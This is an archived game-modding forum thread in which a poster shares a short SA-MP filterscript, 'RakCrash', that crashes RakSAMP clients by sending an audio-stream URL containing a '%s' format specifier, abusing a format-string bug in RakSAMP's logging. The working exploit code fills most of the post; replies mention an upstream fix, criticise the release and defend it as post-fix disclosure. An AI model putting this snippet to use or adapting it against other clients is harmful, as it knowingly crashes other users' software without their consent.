[FilterScript] RakCrash - Crash RakSAMP players! [SNIPPET] - Printable Version
+- SA-MP Forums Archive (https://sampforum.blast.hk)
+-- Forum: SA-MP Scripting and Plugins (https://sampforum.blast.hk/forumdisplay.php?fid=8)
+--- Forum: Filterscripts (https://sampforum.blast.hk/forumdisplay.php?fid=17)
+--- Thread: [FilterScript] RakCrash - Crash RakSAMP players! [SNIPPET] (/showthread.php?tid=657987)
+- SA-MP Forums Archive (https://sampforum.blast.hk)
+-- Forum: SA-MP Scripting and Plugins (https://sampforum.blast.hk/forumdisplay.php?fid=8)
+--- Forum: Filterscripts (https://sampforum.blast.hk/forumdisplay.php?fid=17)
+--- Thread: [FilterScript] RakCrash - Crash RakSAMP players! [SNIPPET] (/showthread.php?tid=657987)
RakCrash - Crash RakSAMP players! [SNIPPET] - SlowARG - 20.08.2018
RakCrash
Snippet for crashing RakSAMP players.
••• Description •••Snippet for crashing RakSAMP players.
There's a little bug in RakSAMP so it's possible to crash RakSAMP players by abusing null strings.
••• How? •••
RakSAMP crashes when passing string format specifier in Log() function.
Since SA-MP client doesn't crash passing null string inside audio stream, we can abuse this to crash invalid clients such as RakSAMP.
••• Downloads •••
PHP Code:
#include <a_samp>
#define FILTERSCRIPT
#define _RAKCRASH_HIDE // Hide "%s" in "real URL".Â
/********************************************************************************
* How it works?                                                                    *
* RakSAMP crashes when passing string format specifier in Log() function.        *
* File: netrpc.cpp on ScrPlayAudioStream function:                                *
* Log("[AUDIO_STREAM] %s", szURL); --> if szURL contains %s, it will crash        *
* Since SA-MP client doesn't crash passing null string inside audio stream        *
* we can abuse this to crash invalid clients such as RakSAMP.                    *
*********************************************************************************/
public OnPlayerConnect(playerid)
{
#if defined _RAKCRASH_HIDE
    PlayAudioStreamForPlayer(playerid, "https://dl.dropboxusercontent.com/s/ac4oqi08gtiuzb0/intro%samp.mp3?dl=0"); // you can use any url containing %s or %20s or something else. It doesn't need to be a valid URL.
#else
    PlayAudioStreamForPlayer(playerid, "%s");
#endif
    StopAudioStreamForPlayer(playerid);
    return 1;
}Â
Nobody.
Re: RakCrash - Crash RakSAMP players! [SNIPPET] - brauf - 20.08.2018
https://github.com/P3ti/RakSAMP/pull/23
didn't live long.
Re: RakCrash - Crash RakSAMP players! [SNIPPET] - KinderClans - 20.08.2018
Quote:
|
Originally Posted by brauf
 |
Died before borning.
Re: RakCrash - Crash RakSAMP players! [SNIPPET] - SlowARG - 21.08.2018
It'll live for a long because RakSAMP hasn't been updated for a long time. Anyway lot of "users" don't know about new RakSAMP updates so it'll be functional like old RakCrash method.
Best regards.
Re: RakCrash - Crash RakSAMP players! [SNIPPET] - iAmir - 21.08.2018
Awesome, you release a code that can crash RakSAMP clients, then you create a PR in RakSAMP's repo and tell'em about your own release RakCrash and attempt to fix it.
pathetic...
Re: RakCrash - Crash RakSAMP players! [SNIPPET] - SlowARG - 21.08.2018
Quote:
|
Originally Posted by iAmir
Awesome, you release a code that can crash RakSAMP clients, then you create a PR in RakSAMP's repo and tell'em about your own release RakCrash and attempt to fix it.
pathetic... |
I did a PR on GitHub before this post.
When someone finds a vulnerability in any software, such as Windows OS, first fix the vuln and then release a PoC code.
So I fixed the bug and then release the PoC.
I don't want rep or similar bullshit. I released this snippet to combat script kiddies that can't compile RakSAMP by themselves.
So if you will not comment any constructive message then don't fricking disturb.
Again, calm down.
Re: RakCrash - Crash RakSAMP players! [SNIPPET] - rorrobryan - 26.08.2018
Thanks!